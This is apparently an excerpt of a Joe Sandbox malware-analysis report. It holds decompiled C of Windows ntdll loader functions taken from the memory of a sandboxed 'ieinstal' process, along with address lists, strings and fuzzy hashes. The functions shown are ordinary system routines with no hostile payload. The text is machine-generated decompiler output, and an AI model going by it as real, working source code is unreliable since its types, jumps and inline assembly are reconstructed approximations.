							_t134 = E1EFD5D90(_t119,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t140);
							if(_t134 != 0) {
								_push( &_v56);
								_push(_t140);
								_push(_t134);
								_push(2);
								_push( &_v36);
								_push(_v48);
								_t137 = E1F002B00();
								if(_t137 < 0) {
									if(_t137 != 0x80000005) {
										goto L54;
									}
									L35:
									_t124 =  *(_t134 + 8);
									_t49 = _t134 + 0xc; // 0xc
									_t131 = _t49;
									_v56 = _t124;
									if(_t137 < 0) {
										L50:
										_t102 = _a28;
										if(_t102 != 0) {
											 *_t102 = _t124;
										}
										if(_t137 >= 0) {
											E1F0088C0(_a20, _t131, _t124);
										}
										goto L54;
									}
									_t117 = _a24;
									if( *((intOrPtr*)(_t131 + (_t124 >> 1) * 2 - 2)) != 0) {
										_t124 = _t124 + 2;
										_v56 = _t124;
										if(_t117 < _t124) {
											_t137 = 0x80000005;
										} else {
											 *((short*)(_t131 + (_t124 >> 1) * 2 - 2)) = 0;
											_t124 = _v56;
										}
									}
									if(_t137 < 0 ||  *((intOrPtr*)(_t134 + 4)) != 2) {
										goto L50;
									} else {
										_t125 = _t131;
										_t61 = _t125 + 2; // 0xe
										_t141 = _t61;
										do {
											_t106 =  *_t125;
											_t125 = _t125 + 2;
										} while (_t106 != _v44);
										_t113 = 0;
										_t137 = E1EFEC3D0(0, _t131, _t125 - _t141 >> 1, _a20, _t117 >> 1,  &_v40);
										if(_t137 >= 0 || _t137 == 0xc0000023) {
											_t128 = _a28;
											if(_t128 != 0) {
												 *_t128 = _v40 + _v40;
											}
											if(_t137 == 0xc0000023) {
												_t137 = 0x80000005;
											}
										}
										goto L10;
									}
								}
								if( *((intOrPtr*)(_t134 + 4)) == 1 ||  *((intOrPtr*)(_t134 + 4)) == 2) {
									goto L35;
								} else {
									_t137 = 0xc0000024;
									goto L54;
								}
							}
							_t137 = 0xc0000017;
							goto L54;
						} else {
							_t137 = 0xc0000095;
							L54:
							_t113 = 0;
							goto L10;
						}
					}
					 *0x1f0b6618 = 1;
					goto L3;
				} else {
					_t137 = 0xc0000034;
					L3:
					_t130 = _a12;
					if(_t130 == 0) {
						L10:
						if(_v52 != 0) {
							_push(_v52);
							E1F002A80();
						}
						if(_v48 != 0) {
							_push(_v48);
							E1F002A80();
						}
						if(_t134 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t113, _t134);
						}
						_t81 = _t137;
						goto L14;
					} else {
						_t120 = _t130;
						_t139 = _t120 + 2;
						goto L5;
						L5:
						_t89 =  *_t120;
						_t120 = _t120 + 2;
						if(_t89 != _t113) {
							goto L5;
						} else {
							_t90 = (_t120 - _t139 >> 1) + 1;
							_t123 = _t90 + _t90;
							_v56 = _t123;
							if(_t123 < _t90) {
								_t137 = 0xc0000095;
							} else {
								_t91 = _a28;
								asm("sbb esi, esi");
								_t137 = _t139 & 0x80000005;
								if(_t91 != 0) {
									 *_t91 = _t123;
								}
								if(_t123 <= _a24) {
									E1F0088C0(_a20, _t130, _t123);
								}
							}
							goto L10;
						}
					}
				}
			}

0x1eff5beb
0x1eff5bef
0x1eff5bf1
0x1eff5bf5
0x1eff5bf9
0x1eff5bff
0x1eff5c03
0x1eff5cf0
0x00000000
0x00000000
0x1eff5cf6
0x1eff5c8b
0x1eff5c91
0x1eff5c91
0x1eff5c09
0x1eff5c09
0x1eff5c0f
0x1eff5c9f
0x1eff5ca7
0x1eff5caf
0x1eff5cb0
0x1eff5cb9
0x1eff5cbd
0x1eff5cbe
0x1eff5cc6
0x1eff5cca
0x1eff5cd3
0x1eff5cdb
0x1f033a63
0x00000000
0x00000000
0x1f033a71
0x1f033a7a
0x1f033a82
0x1f033a8a
0x1f033a8b
0x1f033a94
0x1f033a9c
0x1f033a9d
0x1f033aa5
0x1f033aa9
0x1f033ab2
0x1f033aba
0x00000000
0x00000000
0x1f033ac2
0x00000000
0x00000000
0x1f033ac8
0x1f033acd
0x1f033acf
0x1f033acf
0x1f033ada
0x1f033ae2
0x1f033ae2
0x1f033ae7
0x1f033b0f
0x1f033b13
0x1f033b23
0x1f033b24
0x1f033b25
0x1f033b26
0x1f033b2c
0x1f033b2d
0x1f033b36
0x1f033b3a
0x1f033b58
0x00000000
0x00000000
0x1f033b5e
0x1f033b5e
0x1f033b61
0x1f033b61
0x1f033b64
0x1f033b6a
0x1f033c08
0x1f033c08
0x1f033c0d
0x1f033c0f
0x1f033c0f
0x1f033c13
0x1f033c1a
0x1f033c1f
0x00000000
0x1f033c13
0x1f033b7b
0x1f033b7e
0x1f033b80
0x1f033b83
0x1f033b89
0x1f033b9a
0x1f033b8b
0x1f033b8f
0x1f033b94
0x1f033b94
0x1f033b89
0x1f033ba1
0x00000000
0x1f033ba9
0x1f033ba9
0x1f033bab
0x1f033bab
0x1f033bae
0x1f033bae
0x1f033bb1
0x1f033bb4
0x1f033bc8
0x1f033bd4
0x1f033bdd
0x1f033be7
0x1f033bec
0x1f033bf4
0x1f033bf4
0x1f033bf8
0x1f033bfe
0x1f033bfe
0x1f033bf8
0x00000000
0x1f033bdd
0x1f033ba1
0x1f033b40
0x00000000
0x1f033b48
0x1f033b48
0x00000000
0x1f033b48
0x1f033b40
0x1f033b15
0x00000000
0x1f033ae9
0x1f033ae9
0x1f033c22
0x1f033c22
0x00000000
0x1f033c22
0x1f033ae7
0x1eff5ce1
0x00000000
0x1eff5c15
0x1eff5c15
0x1eff5c1a
0x1eff5c1a
0x1eff5c1f
0x1eff5c6b
0x1eff5c70
0x1f033c29
0x1f033c2d
0x1f033c2d
0x1eff5c7b
0x1f033c37
0x1f033c3b
0x1f033c3b
0x1eff5c83
0x1f033c50
0x1f033c50
0x1eff5c89
0x00000000
0x1eff5c21
0x1eff5c21
0x1eff5c23
0x1eff5c23
0x1eff5c26
0x1eff5c26
0x1eff5c29
0x1eff5c2f
0x00000000
0x1eff5c31
0x1eff5c35
0x1eff5c38
0x1eff5c3b
0x1eff5c41
0x1f033af3
0x1eff5c47
0x1eff5c4a
0x1eff5c4d
0x1eff5c4f
0x1eff5c57
0x1eff5c94
0x1eff5c94
0x1eff5c5c
0x1eff5c63
0x1eff5c68
0x1eff5c5c
0x00000000
0x1eff5c41
0x1eff5c2f
0x1eff5c1f

Strings

TargetPath, xrefs: 1F033ACF, 1F033AD4
@, xrefs: 1F033A9D

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$TargetPath
API String ID: 0-4164548946
Opcode ID: af7527b20d7fb8640bee2fdb2c24f8942c021f908fd5fd6d07cb0fb77533e6af
Instruction ID: 09a56b5e658b79ce5eeeed26197d881b80a63dfd23ba23aefa1a25d27a25b5f1
Opcode Fuzzy Hash: af7527b20d7fb8640bee2fdb2c24f8942c021f908fd5fd6d07cb0fb77533e6af
Instruction Fuzzy Hash: 5581EC72904746DFD711DE24C8E4A9BB7E4BB80715F058A2DED869B350E332ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1EFCAB70 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1EFCAB70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t60;
				short _t61;
				signed char** _t63;
				signed char* _t64;
				signed char* _t65;
				signed char* _t66;
				signed char* _t68;
				signed int _t69;
				signed char** _t74;
				signed char* _t75;
				signed char* _t76;
				intOrPtr _t81;
				signed char* _t91;
				short _t92;
				signed int _t96;
				signed int _t100;
				signed int _t104;
				intOrPtr _t112;
				signed char* _t113;
				void* _t118;

				_push(0x4c);
				_push(0x1f09bf40);
				E1F017BE4(__ebx, __edi, __esi);
				_t92 = 0x36;
				 *((short*)(_t118 - 0x38)) = _t92;
				_t60 = 0x38;
				 *((short*)(_t118 - 0x36)) = _t60;
				 *(_t118 - 0x34) = L"LdrpResGetMappingSize Enter";
				_t61 = 0x34;
				 *((short*)(_t118 - 0x40)) = _t61;
				 *((short*)(_t118 - 0x3e)) = _t92;
				 *(_t118 - 0x3c) = L"LdrpResGetMappingSize Exit";
				_t63 =  *( *[fs:0x30] + 0x50);
				if(_t63 != 0) {
					__eflags =  *_t63;
					if( *_t63 == 0) {
						goto L1;
					}
					_t64 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					if(( *_t64 & 0x00000001) != 0) {
						_t65 = E1EFD3C40();
						_t115 = 0x7ffe0384;
						__eflags = _t65;
						if(_t65 == 0) {
							_t66 = 0x7ffe0384;
						} else {
							_t66 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1F04FC01(_t118 - 0x38,  *_t66 & 0x000000ff);
						L4:
						_t104 =  *(_t118 + 8);
						if(_t104 == 0) {
							L49:
							_t68 = 0xc000000d;
							L21:
							 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0x10));
							return _t68;
						}
						_t96 =  *(_t118 + 0xc);
						if(_t96 == 0) {
							goto L49;
						}
						 *((intOrPtr*)(_t118 - 0x28)) = 0;
						_t69 =  *(_t118 + 0x10);
						if((_t69 & 0x00020000) != 0) {
							 *((intOrPtr*)(_t118 - 0x28)) =  *_t96;
						}
						 *_t96 =  *_t96 & 0x00000000;
						_t91 = 0;
						asm("bt eax, 0x8");
						 *(_t118 - 0x19) = (_t96 & 0xffffff00 | (_t104 & 0x00000001) == 0x00000000) & (_t69 & 0xffffff00 | (_t104 & 0x00000001) > 0x00000000);
						 *(_t118 - 0x34) = _t104 & 0xfffffffc;
						_t68 = E1EFCE580(1, _t104 & 0xfffffffc, 0, 0, _t118 - 0x2c);
						 *(_t118 - 0x20) = _t68;
						if(_t68 < 0) {
							goto L21;
						} else {
							 *(_t118 - 4) =  *(_t118 - 4) & 0;
							_t112 =  *((intOrPtr*)(_t118 - 0x2c));
							_t29 = _t112 + 0x18; // 0xe81f0bb3
							_t100 =  *_t29 & 0x0000ffff;
							_t105 = 0x10b;
							if(_t100 != 0x10b) {
								L29:
								_t105 = 0x20b;
								__eflags = _t100 - 0x20b;
								if(_t100 == 0x20b) {
									goto L9;
								}
								_t113 = 0;
								 *(_t118 - 0x24) = 0;
								_t68 = 0xc000007b;
								 *(_t118 - 0x20) = 0xc000007b;
								L10:
								 *(_t118 - 4) = 0xfffffffe;
								if(_t68 < 0) {
									goto L21;
								}
								if( *(_t118 - 0x19) == 0 || _t113 == 0) {
									__eflags =  *((char*)(_t118 + 0x14));
									if(__eflags == 0) {
										_t91 = E1EFCE6AC(_t91,  *(_t118 + 8), _t105, _t113, _t115, __eflags);
									}
									__eflags = _t91;
									if(_t91 != 0) {
										_t68 = 0;
										 *(_t118 - 0x20) = 0;
									} else {
										_push(_t91);
										_push(0x1c);
										_push(_t118 - 0x5c);
										_push(3);
										_push( *(_t118 - 0x34));
										_push(0xffffffff);
										_t68 = E1F002BE0();
										 *(_t118 - 0x20) = _t68;
										__eflags = _t68;
										if(_t68 >= 0) {
											_t91 =  *(_t118 - 0x50);
										}
									}
									__eflags = _t91;
									if(_t91 != 0) {
										goto L14;
									} else {
										__eflags = _t113;
										if(_t113 == 0) {
											goto L14;
										} else {
											_t68 = 0;
											 *(_t118 - 0x20) = 0;
											goto L13;
										}
										goto L29;
									}
								} else {
									L13:
									_t91 = _t113;
									L14:
									if(_t68 < 0) {
										L17:
										_t74 =  *( *[fs:0x30] + 0x50);
										if(_t74 != 0) {
											__eflags =  *_t74;
											if( *_t74 == 0) {
												goto L18;
											}
											_t75 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											L19:
											if(( *_t75 & 0x00000001) != 0) {
												_t76 = E1EFD3C40();
												__eflags = _t76;
												if(_t76 != 0) {
													_t115 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
												}
												E1F04FC01(_t118 - 0x40,  *_t115 & 0x000000ff);
											}
											_t68 =  *(_t118 - 0x20);
											goto L21;
										}
										L18:
										_t75 = 0x7ffe0385;
										goto L19;
									}
									_t81 =  *((intOrPtr*)(_t118 - 0x28));
									if(_t81 != 0) {
										__eflags = _t81 - _t91;
										if(_t81 >= _t91) {
											goto L16;
										}
										 *(_t118 - 0x20) = 0xc000001f;
										goto L17;
									}
									L16:
									 *( *(_t118 + 0xc)) = _t91;
									goto L17;
								}
							}
							L9:
							_t30 = _t112 + 0x50; // 0xadd9ffff
							_t113 =  *_t30;
							 *(_t118 - 0x24) = _t113;
							goto L10;
						}
					}
					_t115 = 0x7ffe0384;
					goto L4;
				}
				L1:
				_t64 = 0x7ffe0385;
				goto L2;
			}

0x1efcab70
0x1efcab72
0x1efcab77
0x1efcab7e
0x1efcab7f
0x1efcab85
0x1efcab86
0x1efcab8a
0x1efcab93
0x1efcab94
0x1efcab98
0x1efcab9c
0x1efcaba9
0x1efcabae
0x1f023065
0x1f023068
0x00000000
0x00000000
0x1f023077
0x1efcabb9
0x1efcabbc
0x1f023081
0x1f023086
0x1f02308b
0x1f02308d
0x1f02309f
0x1f02308f
0x1f023098
0x1f023098
0x1f0230a7
0x1efcabc7
0x1efcabc7
0x1efcabcc
0x1f02315a
0x1f02315a
0x1efcac91
0x1efcac94
0x1efcaca0
0x1efcaca0
0x1efcabd2
0x1efcabd7
0x00000000
0x00000000
0x1efcabdf
0x1efcabe2
0x1efcabea
0x1f0230b3
0x1f0230b3
0x1efcabf0
0x1efcabf3
0x1efcabfd
0x1efcac06
0x1efcac0e
0x1efcac1a
0x1efcac1f
0x1efcac24
0x00000000
0x1efcac26
0x1efcac26
0x1efcac29
0x1efcac2c
0x1efcac2c
0x1efcac30
0x1efcac38
0x1efcacdd
0x1efcacdd
0x1efcace2
0x1efcace5
0x00000000
0x00000000
0x1f0230bb
0x1f0230bd
0x1f0230c0
0x1f0230c5
0x1efcac44
0x1efcac44
0x1efcac4d
0x00000000
0x00000000
0x1efcac53
0x1efcaca3
0x1efcaca7
0x1efcacb1
0x1efcacb1
0x1efcacb3
0x1efcacb5
0x1efcacf0
0x1efcacf2
0x1efcacb7
0x1efcacb7
0x1efcacb8
0x1efcacbd
0x1efcacbe
0x1efcacc0
0x1efcacc3
0x1efcacc5
0x1efcacca
0x1efcaccd
0x1efcaccf
0x1efcacd1
0x1efcacd1
0x1efcaccf
0x1efcacd4
0x1efcacd6
0x00000000
0x1efcacd8
0x1f0230f0
0x1f0230f2
0x00000000
0x1f0230f8
0x1f0230f8
0x1f0230fa
0x00000000
0x1f0230fa
0x00000000
0x1f0230f2
0x1efcac59
0x1efcac59
0x1efcac59
0x1efcac5b
0x1efcac5d
0x1efcac6f
0x1efcac75
0x1efcac7a
0x1f023116
0x1f023119
0x00000000
0x00000000
0x1f023128
0x1efcac85
0x1efcac88
0x1f023132
0x1f023137
0x1f023139
0x1f023144
0x1f023144
0x1f023144
0x1f023150
0x1f023150
0x1efcac8e
0x00000000
0x1efcac8e
0x1efcac80
0x1efcac80
0x00000000
0x1efcac80
0x1efcac5f
0x1efcac64
0x1f023102
0x1f023104
0x00000000
0x00000000
0x1f02310a
0x00000000
0x1f02310a
0x1efcac6a
0x1efcac6d
0x00000000
0x1efcac6d
0x1efcac53
0x1efcac3e
0x1efcac3e
0x1efcac3e
0x1efcac41
0x00000000
0x1efcac41
0x1efcac24
0x1efcabc2
0x00000000
0x1efcabc2
0x1efcabb4
0x1efcabb4
0x00000000

Strings

LdrpResGetMappingSize Exit, xrefs: 1EFCAB9C
LdrpResGetMappingSize Enter, xrefs: 1EFCAB8A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
API String ID: 0-1497657909
Opcode ID: 654a13b575e9d90711746c00c102b8afd3ddc2b1f2abfe0f1ed9c53adcd76678
Instruction ID: ab41557b450747343095fc4767d1f24b74278818101a93a115f23923c9ba5915
Opcode Fuzzy Hash: 654a13b575e9d90711746c00c102b8afd3ddc2b1f2abfe0f1ed9c53adcd76678
Instruction Fuzzy Hash: 0861C171A04A869FDB01CFA9C8A0F9DB7F5FF44744F240269ED02AB290E779E944C760

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF4B79 Relevance: 2.7, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1EFF4B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x1f0bb370 ^ _t114;
				_v8 =  *0x1f0bb370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E1F004B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							L1F018A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							L1F018A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x1f0b65e4; // 0x75c6f0e0
															 *0x1f0b91e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E1EFC26A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x1f0b37c0 & 0x00000003) != 0) {
																		E1F03E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x1f0b37c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x1f0b37c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E1F03E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}

0x1eff4b79
0x1eff4b86
0x1eff4b88
0x1eff4b8e
0x1eff4b90
0x1eff4b93
0x1eff4b97
0x1eff4c27
0x1eff4c35
0x1eff4ba7
0x1eff4ba7
0x1eff4baa
0x1eff4bac
0x1eff4bb2
0x1eff4bb2
0x1eff4bb5
0x1eff4bbc
0x1f03330f
0x1f033316
0x1f033317
0x1f03331e
0x1f033321
0x1f033324
0x1f033327
0x1f03332a
0x1f033331
0x1f033334
0x1f033339
0x1f03333e
0x1f03333e
0x1eff4bca
0x1f033344
0x1f03334b
0x1f03334c
0x1f033353
0x1f033356
0x1f03335d
0x1f033360
0x1f033363
0x1f03336a
0x1f03336d
0x1f033372
0x1f033372
0x1eff4bd0
0x1eff4bd0
0x1eff4bd5
0x1eff4c36
0x1eff4c36
0x00000000
0x1eff4bd7
0x1eff4bd7
0x1eff4bd7
0x1eff4bdf
0x00000000
0x1eff4be1
0x1eff4be3
0x1eff4bec
0x1eff4bef
0x1eff4bf0
0x1eff4bf9
0x1eff4bfd
0x1eff4bff
0x1eff4c04
0x1eff4c06
0x1eff4c07
0x1eff4c0a
0x1eff4c0c
0x1eff4c0f
0x1eff4c1a
0x1eff4c1c
0x1eff4c21
0x1f03337a
0x1f03337a
0x1f03337d
0x1f03337d
0x1f033384
0x00000000
0x1f033386
0x1f033386
0x1f03338b
0x1f0333b2
0x1f0333b5
0x1f0333b9
0x1f0333be
0x1f0333f7
0x1f0333f7
0x1eff4c76
0x1eff4c84
0x1eff4c8c
0x1eff4c90
0x1eff4ca9
0x1eff4ca9
0x1eff4cae
0x1eff4ce4
0x1eff4cee
0x1eff4cf3
0x1eff4cf3
0x1eff4ce6
0x1eff4ce6
0x1eff4cb2
0x1f033463
0x1f03347b
0x1f033480
0x1f03348a
0x1f033490
0x1f033490
0x1f03348a
0x1eff4cbe
0x1eff4c92
0x1eff4c98
0x1eff4cc5
0x00000000
0x1f033423
0x1f033429
0x00000000
0x1f03342f
0x00000000
0x1f03342f
0x1f033429
0x00000000
0x1eff4c9a
0x1eff4c9a
0x1eff4ca1
0x1f033434
0x1f033435
0x1f03344f
0x1f033454
0x1f033454
0x1eff4ca7
0x1eff4ca7
0x00000000
0x1eff4c98
0x1f033391
0x1f033398
0x1f03339c
0x1f0333a2
0x00000000
0x1f0333a2
0x1f03338b
0x00000000
0x1f0333a7
0x1f0333a7
0x1f0333a9
0x1f0333ad
0x1eff4c21
0x1eff4c1a
0x1eff4c04
0x00000000
0x1eff4bfd
0x1eff4bdf
0x00000000
0x1eff4bd5
0x00000000
0x1eff4bac
0x00000000

Strings

0, xrefs: 1EFF4BE3
Flst, xrefs: 1EFF4BB6

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: a93cfab4ffbb1981d1c6b86e77408060b4d36cb55e7242a69e84faabe523a9f9
Instruction ID: c235a52fe6e30f29f541561d4fbcf9aa2d8a1e04d19e0c32b953687bd1703d2a
Opcode Fuzzy Hash: a93cfab4ffbb1981d1c6b86e77408060b4d36cb55e7242a69e84faabe523a9f9
Instruction Fuzzy Hash: AD51CCB2E00289CFDB24CF95C5A479DFBF5EF40715F14C22AD4499B264E7B1AA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF2DBC Relevance: 2.6, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E1EFF2DBC(void* __ecx, signed int __edx, signed short* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t37;
				void* _t54;
				signed int* _t56;
				void* _t58;
				intOrPtr _t66;
				signed int _t69;
				void* _t70;
				signed int _t73;
				signed short* _t74;
				void* _t75;
				signed int* _t76;

				_t74 = _a4;
				_t54 = __ecx;
				_t37 = __edx;
				_t73 = 0;
				_v12 = __edx;
				if(__ecx == 0 || __edx < 1 || __edx >  *((intOrPtr*)(__ecx + 4))) {
					_t56 = _a8;
					goto L17;
				} else {
					if(_t74 == 0) {
						_t56 = _a8;
						L20:
						_v8 = _v8 & _t73;
						L21:
						if(_t74 == 0) {
							_v12 = _v12 & _t73;
						} else {
							_v12 =  *_t74 & 0x0000ffff;
						}
						if(_t54 == 0) {
							_t66 = 0;
						} else {
							_t66 =  *((intOrPtr*)(_t54 + 4));
						}
						_push(_t56);
						_push(_v8);
						_push(_v12);
						_push(_t74);
						_push(_t66);
						_push(_t37);
						_push(_t54);
						E1F04EF10(0x33, 0, "SXS: %s() bad parameters\nSXS:  Map                    : %p\nSXS:  AssemblyRosterIndex    : 0x%lx\nSXS:  Map->AssemblyCount     : 0x%lx\nSXS:  StorageLocation        : %p\nSXS:  StorageLocation->Length: 0x%x\nSXS:  StorageLocation->Buffer: %p\nSXS:  OpenDirectoryHandle    : %p\n", "RtlpInsertAssemblyStorageMapEntry");
						_t75 = 0xc000000d;
						L12:
						if(_t73 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t73);
						}
						L13:
						return _t75;
					}
					_t69 =  *_t74 & 0x0000ffff;
					_t58 = 2;
					_t56 = _a8;
					if(_t69 < _t58 || _t74[2] == 0 || _t56 == 0) {
						L17:
						if(_t74 == 0) {
							goto L20;
						}
						_v8 = _t74[2];
						goto L21;
					} else {
						_t59 = _t69;
						if(_t69 + 2 > 0xfffe) {
							_t75 = 0xc0000106;
							goto L13;
						}
						_t73 = E1EFD5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t59 + 0x12);
						if(_t73 == 0) {
							_t75 = 0xc0000017;
							goto L13;
						}
						 *_t73 =  *_t73 & 0x00000000;
						_t9 = _t73 + 0x10; // 0x10
						 *(_t73 + 4) =  *_t74;
						 *((intOrPtr*)(_t73 + 8)) = _t9;
						_t70 = 2;
						 *((short*)(_t73 + 6)) =  *_t74 + _t70;
						E1F0088C0(_t9, _t74[2],  *_t74 & 0x0000ffff);
						_t76 = _a8;
						 *((short*)( *((intOrPtr*)(_t73 + 8)) + (( *(_t73 + 4) & 0x0000ffff) >> 1) * 2)) = 0;
						 *(_t73 + 0xc) =  *_t76;
						asm("lock cmpxchg [edx], ecx");
						if(0 == 0) {
							_t73 = 0;
							 *_t76 =  *_t76 & 0;
						}
						_t75 = 0;
						goto L12;
					}
				}
			}

0x1eff2dc6
0x1eff2dc9
0x1eff2dcc
0x1eff2dce
0x1eff2dd0
0x1eff2dd5
0x1f0325d7
0x00000000
0x1eff2ded
0x1eff2def
0x1f0325e6
0x1f0325e9
0x1f0325e9
0x1f0325ec
0x1f0325ee
0x1f0325f8
0x1f0325f0
0x1f0325f3
0x1f0325f3
0x1f0325fd
0x1f032604
0x1f0325ff
0x1f0325ff
0x1f0325ff
0x1f032606
0x1f032607
0x1f03260a
0x1f03260d
0x1f03260e
0x1f03260f
0x1f032610
0x1f03261f
0x1f032627
0x1eff2ea0
0x1eff2ea2
0x1f03263e
0x1f03263e
0x1eff2ea9
0x1eff2eae
0x1eff2eae
0x1eff2df5
0x1eff2dfa
0x1eff2dfe
0x1eff2e01
